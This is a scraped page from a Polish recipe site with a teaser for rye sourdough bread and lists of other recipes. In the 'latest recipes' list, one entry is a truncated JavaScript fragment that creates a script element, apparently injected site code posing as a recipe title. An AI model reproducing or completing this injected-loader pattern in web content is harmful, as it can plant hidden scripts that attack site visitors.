Chleb żytni pytlowy
Źródło: https://sprawdzonakuchnia.pl/chleb-zytni-pytlowy/
Dziś chleb żytni pytlowy na zakwasie żytnim. Przepis jest przepisem dwufazowym, ponieważ nie ma w nim dodatku drożdży piekarskich, musi mieć czas na wytworzenie odpowiedniej ilości drożdży potrzebnej do wyrośnięcia ciasta. Przygotowanie chleba zaczynamy od przygotowania zaczynu. Zaczyn powinien pracować minimum 9 godzin. Najlepiej przygotować go wieczorem przed pójściem spać, aby móc następnego dnia dokończyć pracę,... Read More Artykuł Chleb żytni pytlowy pochodzi z...
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 13
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 9
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 19
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 16
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Przepisy z bloga
A więc jesień! Pełne słońca wspomnienia z wakacyjnych... ⇖ 114
Świąteczne ciastka czekoladowe z miękkim środkiem w... ⇖ 134
Świąteczne ciastka czekoladowe z miękkim środkiem w... ⇖ 232
Makaron udon jest to jeden z moich ulubionych makaronów.... ⇖ 286
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1813
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1192
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 687
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466









































